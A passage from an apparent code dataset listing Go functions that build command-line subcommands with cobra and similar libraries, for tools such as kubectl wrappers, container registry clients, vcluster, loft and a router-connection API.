err)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\tName: \"remove\",\n\t\t\t\t\t\tUsage: \"Remove a role from a user or group on an image\",\n\t\t\t\t\t\tArgsUsage: \"<image-id>\",\n\t\t\t\t\t\tDescription: \"Remove a role from a user or group on an image. \\n\\n\" +\n\t\t\t\t\t\t\t\" Example: \\n\" +\n\t\t\t\t\t\t\t\" photon image iam remove <image-id> -p [email protected] -r contributor \\n\" +\n\t\t\t\t\t\t\t\" photon image iam remove <image-id> -p photon.local\\\\group1 -r viewer\",\n\t\t\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\t\t\tName: \"principal, p\",\n\t\t\t\t\t\t\t\tUsage: \"User or group\",\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\t\t\tName: \"role, r\",\n\t\t\t\t\t\t\t\tUsage: \"'owner', 'contributor' and 'viewer'. Or use '*' to remove all existing roles.\",\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\t\t\terr := modifyImageIamPolicy(c, os.Stdout, \"REMOVE\")\n\t\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\treturn command\n}", "func (c *CLI) NewCmd(command string, args ...string) icmd.Cmd {\n\treturn icmd.Cmd{\n\t\tCommand: append([]string{command}, args...),\n\t\tEnv: append(c.BaseEnvironment(), c.env...),\n\t}\n}", "func NewCommand() *cobra.Command {\n\tkp := &KubebuilderProject{}\n\n\treturn framework.TemplateCommand{\n\t\tAPI: kp,\n\n\t\tMergeResources: true, // apply additional inputs as patches\n\n\t\t// these are run before the templates\n\t\tPreProcessFilters: []kio.Filter{\n\t\t\t// run controller-gen libraries to generate configuration from code\n\t\t\tControllerGenFilter{KubebuilderProject: kp},\n\t\t\t// inject generated certificates\n\t\t\tCertFilter{KubebuilderProject: kp},\n\t\t},\n\n\t\t// generate resources\n\t\tTemplatesFn: framework.TemplatesFromDir(pkger.Dir(\"/config-gen/templates/resources\")),\n\n\t\t// patch resources\n\t\tPatchTemplatesFn: framework.PatchTemplatesFromDir(\n\t\t\tCRDPatchTemplate(kp),\n\t\t\tCertManagerPatchTemplate(kp),\n\t\t\tControllerManagerPatchTemplate(kp),\n\t\t),\n\n\t\t// perform final modifications\n\t\tPostProcessFilters: []kio.Filter{\n\t\t\t// sort the resources\n\t\t\tComponentFilter{KubebuilderProject: kp},\n\t\t\tSortFilter{KubebuilderProject: kp},\n\t\t},\n\t}.GetCommand()\n}", "func newKubectlCmd() *cobra.Command {\n\tresult := &cobra.Command{\n\t\tUse: \"kubectl\",\n\t\tShort: \"kubectl controls the Kubernetes cluster manager\",\n\t\tHidden: true,\n\t}\n\n\tgenericFlags := genericclioptions.NewConfigFlags(true)\n\tgenericFlags.AddFlags(result.PersistentFlags())\n\tmatchVersionFlags := cmdutil.NewMatchVersionFlags(genericFlags)\n\tmatchVersionFlags.AddFlags(result.PersistentFlags())\n\n\tf := cmdutil.NewFactory(matchVersionFlags)\n\tioStreams := genericclioptions.IOStreams{In: os.Stdin, Out: os.Stdout, ErrOut: os.Stderr}\n\tcmdApply := apply.NewCmdApply(\"kubectl\", f, ioStreams)\n\n\t// TODO(nick): It might make more sense to implement replace and delete with client-go.\n\tcmdReplace := replace.NewCmdReplace(f, ioStreams)\n\tcmdDelete := delete.NewCmdDelete(f, ioStreams)\n\n\tresult.AddCommand(cmdApply)\n\tresult.AddCommand(cmdReplace)\n\tresult.AddCommand(cmdDelete)\n\treturn result\n}", "func (c DefaultCommander) NewCmd(command string, stderr io.Writer, stdin io.Reader) *exec.Cmd {\n\tcmd := exec.Command(\"sh\", \"-c\", command)\n\tif stderr != nil {\n\t\tcmd.Stderr = stderr\n\t}\n\tif stdin != nil {\n\t\tcmd.Stdin = stdin\n\t}\n\treturn cmd\n}", "func newManifestDeleteCmd(manifestParams *manifestParameters) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"delete\",\n\t\tShort: \"Delete manifest from a repository\",\n\t\tLong: newManifestDeleteCmdLongMessage,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tregistryName, err := manifestParams.GetRegistryName()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tloginURL := api.LoginURL(registryName)\n\t\t\tacrClient, err := api.GetAcrCLIClientWithAuth(loginURL, manifestParams.username, manifestParams.password, manifestParams.configs)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tctx := context.Background()\n\t\t\terr = deleteManifests(ctx, acrClient, loginURL, manifestParams.repoName, args)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewManifestAnnotateCmd() *cobra.Command {\n\tannotateCmd := &cobra.Command{\n\t\tUse: \"annotate [FLAGS] MANIFEST_LIST MANIFEST\",\n\t\tShort: \"Annotate a local manifest list\",\n\t\tExample: manifestAnnotateExample,\n\t\tRunE: manifestAnnotateCommand,\n\t}\n\n\tannotateCmd.PersistentFlags().StringVar(&annotateOpts.imageArch, \"arch\", \"\", \"Set architecture\")\n\tannotateCmd.PersistentFlags().StringVar(&annotateOpts.imageOS, \"os\", \"\", \"Set operating system\")\n\tannotateCmd.PersistentFlags().StringSliceVar(&annotateOpts.imageOSFeature, \"os-features\", []string{}, \"Set operating system feature\")\n\tannotateCmd.PersistentFlags().StringVar(&annotateOpts.imageVariant, \"variant\", \"\", \"Set architecture variant\")\n\n\treturn annotateCmd\n}", "func NewCreateCmd() *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"create SUBCOMMAND\",\n\t\tShort: \"Create objects\",\n\t\tLong: `Create objects like users, etc.`,\n\t}\n}", "func NewCmd(command string, args ...string) *Cmd {\n\treturn &Cmd{\n\t\tcommand: command,\n\t\targs: args,\n\t}\n}", "func New(c string, args ...string) *Cmd {\n\tcmd := &Cmd{\n\t\tCmd: exec.Command(c, args...),\n\t}\n\tcmd.Run = func() error {\n\t\treturn cmd.Cmd.Run()\n\t}\n\treturn cmd\n}", "func NewRootCmd(use string, dockerCli command.Cli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tShort: \"Docker Application Packages\",\n\t\tLong: `Build and deploy Docker Application Packages.`,\n\t\tUse: use,\n\t}\n\taddCommands(cmd, dockerCli)\n\treturn cmd\n}", "func NewCommandImageList() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"list\",\n\t\tArgs: cobra.NoArgs,\n\t\tShort: \"Display Docker image on registry\",\n\t\tLong: `Display Docker image list on private registry`,\n\t\tRun: imgListMain,\n\t}\n\n\t//set local flag\n\tutils.AddImageFlag(cmd)\n\n\t//add subcommand\n\treturn cmd\n}", "func createCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a Windows instance on the same provider as the existing OpenShift Cluster.\",\n\t\tLong: \"creates a Windows instance under the same virtual network (AWS-VCP, Azure-Vnet, \" +\n\t\t\t\"and etc.) used by a given OpenShift cluster running on the selected provider. \" +\n\t\t\t\"The created instance would be ready to join the OpenShift Cluster as a worker node.\",\n\t\tPreRunE: func(cmd *cobra.Command, _ []string) error {\n\t\t\treturn validateCreateFlags(cmd)\n\t\t},\n\t\tRunE: func(_ *cobra.Command, _ []string) error {\n\t\t\tcloud, err := cloudprovider.CloudProviderFactory(rootInfo.kubeconfigPath, rootInfo.credentialPath,\n\t\t\t\trootInfo.credentialAccountID, rootInfo.resourceTrackerDir)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error creating cloud provider clients, %v\", err)\n\t\t\t}\n\t\t\terr = cloud.CreateWindowsVM(createFlagInfo.imageID, createFlagInfo.instanceType, createFlagInfo.sshKey)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"error creating Windows Instance, %v\", err)\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.imageID, \"image-id\", \"\",\n\t\t\"ami ID of a base image for the instance (i.e.\"+\n\t\t\t\": ami-06a4e829b8bbad61e for Microsoft Windows Server 2019 Base image on AWS). (required)\")\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.instanceType, \"instance-type\", \"\",\n\t\t\"name of a type of instance (i.e.: m4.large for AWS, etc). (required)\")\n\tcmd.PersistentFlags().StringVar(&createFlagInfo.sshKey, \"ssh-key\", \"\",\n\t\t\"name of existing ssh key on cloud provider for accessing the instance after it is created. (required)\")\n\treturn cmd\n}", "func New() subcommands.Command {\n\treturn &mergeCommand{\n\t\tInfo: cmdutil.NewInfo(\"merge\", \"merge kzip files\", \"--output path kzip-file*\"),\n\t\tencoding: flags.EncodingFlag{Encoding: kzip.DefaultEncoding()},\n\t}\n}", "func newCreateCmd(clientFn func() (*fic.ServiceClient, error), out io.Writer) *cobra.Command {\n\tvar (\n\t\tsrcRouterID string\n\t\tsrcGroupName string\n\t\tsrcPrimary string\n\t\tsrcSecondary string\n\t\tsrcRouteFilter string\n\t\tdestPrimary string\n\t\tdestSecondary string\n\t\tbandwidth string\n\t)\n\n\tr := regexp.MustCompile(`^[\\w&()-]{1,64}$`)\n\tvalidateSrc := func(splitSrc []string, isPrimary, hasSecondary bool) error {\n\t\t_, ipNet, err := net.ParseCIDR(splitSrc[0])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"ipAddress must be CIDR whose subnet mask is 30, e.g. 10.0.0.1/30: received %s\", splitSrc[0])\n\t\t}\n\t\tsubNetMaskLength, _ := ipNet.Mask.Size()\n\t\tif subNetMaskLength != 30 {\n\t\t\treturn fmt.Errorf(\"subnet mask of ipAddress must be 30, e.g. 10.0.0.1/30: received %s\", splitSrc[0])\n\t\t}\n\n\t\tif !utils.StringInSlice(splitSrc[1], validPrepends) {\n\t\t\treturn fmt.Errorf(\"asPathPrepend.in must be one of %s: received %s\", validPrepends, splitSrc[1])\n\t\t}\n\n\t\tif !utils.StringInSlice(splitSrc[2], validPrepends) {\n\t\t\treturn fmt.Errorf(\"asPathPrepend.out must be one of %s: received %s\", validPrepends, splitSrc[2])\n\t\t}\n\n\t\tif isPrimary {\n\t\t\tmed, err := strconv.Atoi(splitSrc[3])\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"med.out must be numeric value: received %s\", splitSrc[3])\n\t\t\t}\n\n\t\t\tif hasSecondary {\n\t\t\t\tif !utils.IntInSlice(med, validPrimaryPairedMEDs) {\n\t\t\t\t\treturn fmt.Errorf(\"med.out in paired connection must be one of %v: received %d\", validPrimaryPairedMEDs, med)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif !utils.IntInSlice(med, validPrimarySingleMEDs) {\n\t\t\t\t\treturn fmt.Errorf(\"med.out in single connection must be one of %v: received %d\", validPrimarySingleMEDs, med)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n\tvalidateDest := func(splitDest []string) error {\n\t\tvlan, err := strconv.Atoi(splitDest[1])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"vlan must be numeric value: received %s\", splitDest[1])\n\t\t}\n\t\tif vlan < 101 || vlan > 3300 {\n\t\t\treturn fmt.Errorf(\"vlan must be range of 101 to 3300: received %s\", splitDest[1])\n\t\t}\n\n\t\t_, ipNet, err := net.ParseCIDR(splitDest[2])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"ipAddress must be CIDR whose subnet mask is 30, e.g. 10.0.0.2/30: received %s\", splitDest[2])\n\t\t}\n\t\tsubNetMaskLength, _ := ipNet.Mask.Size()\n\t\tif subNetMaskLength != 30 {\n\t\t\treturn fmt.Errorf(\"subnet mask of ipAddress must be 30, e.g. 10.0.0.2/30: received %s\", splitDest[2])\n\t\t}\n\n\t\tasn, err := strconv.Atoi(splitDest[3])\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"asn must be numeric value: received %s\", splitDest[3])\n\t\t}\n\t\tif asn < 1 || asn > 65535 {\n\t\t\treturn fmt.Errorf(\"asn must be range of 1 to 65535: received %s\", splitDest[3])\n\t\t}\n\t\treturn nil\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"create <name>\",\n\t\tShort: \"Create router to port connection\",\n\t\tExample: \"# In case of non paired-connection \\n\" +\n\t\t\t\"fic router-to-port-connections create YourConnectionName \" +\n\t\t\t\"--source-router F020123456789 \" +\n\t\t\t\"--source-group group_1 \" +\n\t\t\t\"--source-primary 10.0.0.1/30,4,4,10 \" +\n\t\t\t\"--source-route-filter fullRoute,fullRouteWithDefaultRoute \" +\n\t\t\t\"--destination-primary F010123456789,101,10.0.0.2/30,65000 \" +\n\t\t\t\"--bandwidth 10M \\n\\n\" +\n\t\t\t\"# In case of paired-connection \\n\" +\n\t\t\t\"fic router-to-port-connections create YourConnectionName \" +\n\t\t\t\"--source-router F020123456789 \" +\n\t\t\t\"--source-group group_1 \" +\n\t\t\t\"--source-primary 10.0.0.1/30,4,4,10 \" +\n\t\t\t\"--source-secondary 10.0.0.5/30,2,1 \" +\n\t\t\t\"--source-route-filter fullRoute,fullRouteWithDefaultRoute \" +\n\t\t\t\"--destination-primary F010123456789,101,10.0.0.2/30,65000 \" +\n\t\t\t\"--destination-secondary F019876543210,102,10.0.0.6/30,65000 \" +\n\t\t\t\"--bandwidth 10M\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\n\t\t\tif !r.MatchString(args[0]) {\n\t\t\t\treturn fmt.Errorf(\"name of router to port connection must be composed of alpha-numeric \"+\n\t\t\t\t\t\"characters and & ( ) - _, and must have maximum length of 64 as well: received %s\", args[0])\n\t\t\t}\n\n\t\t\tif !utils.StringInSlice(srcGroupName, validGroupNames) {\n\t\t\t\treturn fmt.Errorf(\"source-group must be one of %s: received %s\", validGroupNames, srcGroupName)\n\t\t\t}\n\n\t\t\tsplitSrcPrimary := strings.Split(strings.TrimSpace(srcPrimary), \",\")\n\t\t\tsplitSrcSecondary := strings.Split(strings.TrimSpace(srcSecondary), \",\")\n\t\t\tsplitSrcRouteFilter := strings.Split(strings.TrimSpace(srcRouteFilter), \",\")\n\t\t\tsplitDestPrimary := strings.Split(strings.TrimSpace(destPrimary), \",\")\n\t\t\tsplitDestSecondary := strings.Split(strings.TrimSpace(destSecondary), \",\")\n\n\t\t\tif len(splitSrcPrimary) != 4 {\n\t\t\t\treturn fmt.Errorf(\"source-primary must have format like \"+\n\t\t\t\t\t\"<ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>,<med.out>: received %s\", srcPrimary)\n\t\t\t}\n\t\t\tif err := validateSrc(splitSrcPrimary, true, srcSecondary != \"\"); err != nil {\n\t\t\t\treturn fmt.Errorf(\"in source-primary, %w\", err)\n\t\t\t}\n\n\t\t\tif len(splitDestPrimary) != 4 {\n\t\t\t\treturn fmt.Errorf(\"destination-primary must have format like \"+\n\t\t\t\t\t\"<portId>,<vlan>,<ipAddress>,<asn>: received %s\", destPrimary)\n\t\t\t}\n\t\t\tif err := validateDest(splitDestPrimary); err != nil {\n\t\t\t\treturn fmt.Errorf(\"in destination-primary, %w\", err)\n\t\t\t}\n\n\t\t\tif srcSecondary != \"\" {\n\t\t\t\tif len(splitSrcSecondary) != 3 {\n\t\t\t\t\treturn fmt.Errorf(\"source-secondary must have format like \"+\n\t\t\t\t\t\t\"<ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>: received %s\", srcSecondary)\n\t\t\t\t}\n\t\t\t\tif err := validateSrc(splitSrcSecondary, false, true); err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"in source-secondary, %w\", err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tredundant := false\n\t\t\tif destSecondary != \"\" {\n\t\t\t\tif len(splitDestSecondary) != 4 {\n\t\t\t\t\treturn fmt.Errorf(\"destination-secondary must have format like \"+\n\t\t\t\t\t\t\"<portId>,<vlan>,<ipAddress>,<asn>: received %s\", destSecondary)\n\t\t\t\t}\n\t\t\t\tif err := validateDest(splitDestSecondary); err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"in destination-secondary, %w\", err)\n\t\t\t\t}\n\t\t\t\tredundant = true\n\t\t\t}\n\n\t\t\tif len(splitSrcRouteFilter) != 2 {\n\t\t\t\treturn fmt.Errorf(\"source-route-filter must have format like \"+\n\t\t\t\t\t\"<routeFilter.in>,<routeFilter.out>: received %s\", srcRouteFilter)\n\t\t\t}\n\t\t\tif !utils.StringInSlice(splitSrcRouteFilter[0], validRouteFilterIns) {\n\t\t\t\treturn fmt.Errorf(\"routeFilter.in must be one of %s: received %s\", validRouteFilterIns, splitSrcRouteFilter[0])\n\t\t\t}\n\t\t\tif !utils.StringInSlice(splitSrcRouteFilter[1], validRouteFilterOuts) {\n\t\t\t\treturn fmt.Errorf(\"routeFilter.out must be one of %s: received %s\", validRouteFilterOuts, splitSrcRouteFilter[1])\n\t\t\t}\n\n\t\t\tif !utils.StringInSlice(bandwidth, validBandwidths) {\n\t\t\t\treturn fmt.Errorf(\"bandwidth must be one of %s: received %s\", validBandwidths, bandwidth)\n\t\t\t}\n\n\t\t\tclient, err := clientFn()\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"creating FIC client: %w\", err)\n\t\t\t}\n\n\t\t\tprependIn, prependOut := interface{}(convPrepend(splitSrcPrimary[1])), interface{}(convPrepend(splitSrcPrimary[2]))\n\t\t\tmed, _ := strconv.Atoi(splitSrcPrimary[3])\n\t\t\tvlan, _ := strconv.Atoi(splitDestPrimary[1])\n\n\t\t\tt := utils.NewTabby(out)\n\t\t\tt.AddHeader(\"id\", \"name\", \"redundant\", \"tenantId\", \"area\", \"operationStatus\", \"bandwidth\", \"operationId\")\n\n\t\t\tif !redundant {\n\t\t\t\topts := singleConn.CreateOpts{\n\t\t\t\t\tName: args[0],\n\t\t\t\t\tSource: singleConn.Source{\n\t\t\t\t\t\tRouterID: srcRouterID,\n\t\t\t\t\t\tGroupName: srcGroupName,\n\t\t\t\t\t\tRouteFilter: singleConn.RouteFilter{\n\t\t\t\t\t\t\tIn: splitSrcRouteFilter[0],\n\t\t\t\t\t\t\tOut: splitSrcRouteFilter[1],\n\t\t\t\t\t\t},\n\t\t\t\t\t\tPrimary: singleConn.SourceHAInfo{\n\t\t\t\t\t\t\tIPAddress: splitSrcPrimary[0],\n\t\t\t\t\t\t\tASPathPrepend: singleConn.ASPathPrepend{\n\t\t\t\t\t\t\t\tIn: &prependIn,\n\t\t\t\t\t\t\t\tOut: &prependOut,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\tMED: &singleConn.MED{\n\t\t\t\t\t\t\t\tOut: med,\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tDestination: singleConn.Destination{\n\t\t\t\t\t\tPrimary: singleConn.DestinationHAInfo{\n\t\t\t\t\t\t\tPortID: splitDestPrimary[0],\n\t\t\t\t\t\t\tVLAN: vlan,\n\t\t\t\t\t\t\tIPAddress: splitDestPrimary[2],\n\t\t\t\t\t\t\tASN: splitDestPrimary[3],\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tBandwidth: bandwidth,\n\t\t\t\t}\n\n\t\t\t\tc, err := singleConn.Create(client, opts).Extract()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fmt.Errorf(\"calling Create router to port connection API: %w\", err)\n\t\t\t\t}\n\n\t\t\t\tt.AddLine(c.ID, c.Name, c.Redundant, c.TenantID, c.Area, c.OperationID, c.OperationStatus, c.Bandwidth)\n\t\t\t\tt.Print()\n\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tsecondPrependIn, secondPrependOut := interface{}(convPrepend(splitSrcSecondary[1])), interface{}(convPrepend(splitSrcSecondary[2]))\n\t\t\tsecondVlan, _ := strconv.Atoi(splitDestSecondary[1])\n\n\t\t\topts := pairedConn.CreateOpts{\n\t\t\t\tName: args[0],\n\t\t\t\tSource: pairedConn.Source{\n\t\t\t\t\tRouterID: srcRouterID,\n\t\t\t\t\tGroupName: srcGroupName,\n\t\t\t\t\tRouteFilter: pairedConn.RouteFilter{\n\t\t\t\t\t\tIn: splitSrcRouteFilter[0],\n\t\t\t\t\t\tOut: splitSrcRouteFilter[1],\n\t\t\t\t\t},\n\t\t\t\t\tPrimary: pairedConn.SourceHAInfo{\n\t\t\t\t\t\tIPAddress: splitSrcPrimary[0],\n\t\t\t\t\t\tASPathPrepend: pairedConn.ASPathPrepend{\n\t\t\t\t\t\t\tIn: &prependIn,\n\t\t\t\t\t\t\tOut: &prependOut,\n\t\t\t\t\t\t},\n\t\t\t\t\t\tMED: &pairedConn.MED{\n\t\t\t\t\t\t\tOut: med,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\tSecondary: pairedConn.SourceHAInfo{\n\t\t\t\t\t\tIPAddress: splitSrcSecondary[0],\n\t\t\t\t\t\tASPathPrepend: pairedConn.ASPathPrepend{\n\t\t\t\t\t\t\tIn: &secondPrependIn,\n\t\t\t\t\t\t\tOut: &secondPrependOut,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tDestination: pairedConn.Destination{\n\t\t\t\t\tPrimary: pairedConn.DestinationHAInfo{\n\t\t\t\t\t\tPortID: splitDestPrimary[0],\n\t\t\t\t\t\tVLAN: vlan,\n\t\t\t\t\t\tIPAddress: splitDestPrimary[2],\n\t\t\t\t\t\tASN: splitDestPrimary[3],\n\t\t\t\t\t},\n\t\t\t\t\tSecondary: pairedConn.DestinationHAInfo{\n\t\t\t\t\t\tPortID: splitDestSecondary[0],\n\t\t\t\t\t\tVLAN: secondVlan,\n\t\t\t\t\t\tIPAddress: splitDestSecondary[2],\n\t\t\t\t\t\tASN: splitDestSecondary[3],\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tBandwidth: bandwidth,\n\t\t\t}\n\n\t\t\tc, err := pairedConn.Create(client, opts).Extract()\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"calling Create router to port connection API: %w\", err)\n\t\t\t}\n\n\t\t\tt.AddLine(c.ID, c.Name, c.Redundant, c.TenantID, c.Area, c.OperationID, c.OperationStatus, c.Bandwidth)\n\t\t\tt.Print()\n\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.Flags().StringVar(&srcRouterID, \"source-router\", \"\", \"(Required) Router ID belonging to source\")\n\tcmd.Flags().StringVar(&srcGroupName, \"source-group\", \"\", \"(Required) Group Name belonging to source\")\n\tcmd.Flags().StringVar(\n\t\t&srcPrimary,\n\t\t\"source-primary\",\n\t\t\"\",\n\t\t\"(Required) Source Primary Info specified in the format <ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>,<med.out>\")\n\tcmd.Flags().StringVar(\n\t\t&srcSecondary,\n\t\t\"source-secondary\",\n\t\t\"\",\n\t\t\"Source Secondary Info specified in the format <ipAddress>,<asPathPrepend.in>,<asPathPrepend.out>\")\n\tcmd.Flags().StringVar(\n\t\t&srcRouteFilter,\n\t\t\"source-route-filter\",\n\t\t\"\",\n\t\t\"(Required) Set of BGP Filter Ingress and Egress specified in the format <routeFilter.in>,<routeFilter.out>\")\n\tcmd.Flags().StringVar(\n\t\t&destPrimary,\n\t\t\"destination-primary\",\n\t\t\"\",\n\t\t\"(Required) Destination Primary Info specified in the format <portId>,<vlan>,<ipAddress>,<asn>\")\n\tcmd.Flags().StringVar(\n\t\t&destSecondary,\n\t\t\"destination-secondary\",\n\t\t\"\",\n\t\t\"Destination Secondary Info specified in the format <portId>,<vlan>,<ipAddress>,<asn>\")\n\tcmd.Flags().StringVar(&bandwidth, \"bandwidth\", \"\", \"(Required) Bandwidth of router to port connection\")\n\n\tcmd.MarkFlagRequired(\"source-router\")\n\tcmd.MarkFlagRequired(\"source-group\")\n\tcmd.MarkFlagRequired(\"source-primary\")\n\tcmd.MarkFlagRequired(\"source-rout-filter\")\n\tcmd.MarkFlagRequired(\"destination-primary\")\n\tcmd.MarkFlagRequired(\"bandwidth\")\n\n\treturn cmd\n}", "func NewCmd(db *bolt.DB) *cobra.Command {\n\topts := editOptions{}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"edit <name>\",\n\t\tShort: \"Edit an entry\",\n\t\tLong: `Edit an entry. \n\t\t\nIf the name is edited, Kure will remove the entry with the old name and create one with the new name.`,\n\t\tExample: example,\n\t\tArgs: cmdutil.MustExist(db, cmdutil.Entry),\n\t\tPreRunE: auth.Login(db),\n\t\tRunE: runEdit(db, &opts),\n\t\tPostRun: func(cmd *cobra.Command, args []string) {\n\t\t\t// Reset variables (session)\n\t\t\topts = editOptions{}\n\t\t},\n\t}\n\n\tcmd.Flags().BoolVarP(&opts.interactive, \"it\", \"i\", false, \"use the text editor\")\n\n\treturn cmd\n}", "func NewCreateCmd(globalFlags *flags.GlobalFlags) *cobra.Command {\n\tcmd := &CreateCmd{\n\t\tGlobalFlags: globalFlags,\n\t\tlog: log.GetInstance(),\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create a new virtual cluster\",\n\t\tLong: `\n#######################################################\n################### vcluster create ###################\n#######################################################\nCreates a new virtual cluster\n\nExample:\nvcluster create test --namespace test\n#######################################################\n\t`,\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cobraCmd *cobra.Command, args []string) error {\n\t\t\t// Check for newer version\n\t\t\tupgrade.PrintNewerVersionWarning()\n\n\t\t\treturn cmd.Run(cobraCmd, args)\n\t\t},\n\t}\n\n\tcobraCmd.Flags().StringVar(&cmd.ChartVersion, \"chart-version\", upgrade.GetVersion(), \"The virtual cluster chart version to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ChartName, \"chart-name\", \"vcluster\", \"The virtual cluster chart name to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ChartRepo, \"chart-repo\", \"https://charts.loft.sh\", \"The virtual cluster chart repo to use\")\n\tcobraCmd.Flags().StringVar(&cmd.ReleaseValues, \"release-values\", \"\", \"Path where to load the virtual cluster helm release values from\")\n\tcobraCmd.Flags().StringVar(&cmd.K3SImage, \"k3s-image\", \"\", \"If specified, use this k3s image version\")\n\tcobraCmd.Flags().StringSliceVarP(&cmd.ExtraValues, \"extra-values\", \"f\", []string{}, \"Path where to load extra helm values from\")\n\tcobraCmd.Flags().BoolVar(&cmd.CreateNamespace, \"create-namespace\", true, \"If true the namespace will be created if it does not exist\")\n\tcobraCmd.Flags().BoolVar(&cmd.DisableIngressSync, \"disable-ingress-sync\", false, \"If true the virtual cluster will not sync any ingresses\")\n\tcobraCmd.Flags().BoolVar(&cmd.CreateClusterRole, \"create-cluster-role\", false, \"If true a cluster role will be created to access nodes, storageclasses and priorityclasses\")\n\tcobraCmd.Flags().BoolVar(&cmd.Expose, \"expose\", false, \"If true will create a load balancer service to expose the vcluster endpoint\")\n\tcobraCmd.Flags().BoolVar(&cmd.Connect, \"connect\", false, \"If true will run vcluster connect directly after the vcluster was created\")\n\treturn cobraCmd\n}", "func NewBackupCmd(out io.Writer) *cobra.Command {\n\tb := &backupCmd{out: out}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"backup\",\n\t\tShort: \"backup cassandra cluster to S3\",\n\t\tLong: ``,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tif _, err := cain.Backup(b.namespace, b.selector, b.container, b.keyspace, b.dst, b.parallel); err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\t\t},\n\t}\n\tf := cmd.Flags()\n\n\tf.StringVarP(&b.namespace, \"namespace\", \"n\", \"\", \"namespace to find cassandra cluster\")\n\tf.StringVarP(&b.selector, \"selector\", \"l\", \"\", \"selector to filter on\")\n\tf.StringVarP(&b.container, \"container\", \"c\", \"cassandra\", \"container name to act on\")\n\tf.StringVarP(&b.keyspace, \"keyspace\", \"k\", \"\", \"keyspace to act on\")\n\tf.StringVar(&b.dst, \"dst\", \"\", \"destination to backup to. Example: s3://bucket/cassandra\")\n\tf.IntVarP(&b.parallel, \"parallel\", \"p\", 1, \"number of files to copy in parallel. set this flag to 0 for full parallelism\")\n\n\treturn cmd\n}", "func NewCmd(clusteradmFlags *genericclioptionsclusteradm.ClusteradmFlags, cmFlags *genericclioptionscm.CMFlags, streams genericclioptions.IOStreams) *cobra.Command {\n\tcmd := clusteradminit.NewCmd(clusteradmFlags, streams)\n\tcmd.Short = \"init feature or hub\"\n\n\treturn cmd\n}", "func NewDeleteCmd(globalFlags *flags.GlobalFlags) *cobra.Command {\n\tdescription := `\n#######################################################\n##################### loft delete #####################\n#######################################################\n\t`\n\tif upgrade.IsPlugin == \"true\" {\n\t\tdescription = `\n#######################################################\n##################### loft delete #####################\n#######################################################\n\t`\n\t}\n\tc := &cobra.Command{\n\t\tUse: \"delete\",\n\t\tShort: \"Deletes loft resources\",\n\t\tLong: description,\n\t\tArgs: cobra.NoArgs,\n\t}\n\n\tc.AddCommand(NewSpaceCmd(globalFlags))\n\tc.AddCommand(NewVirtualClusterCmd(globalFlags))\n\treturn c\n}", "func NewCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: 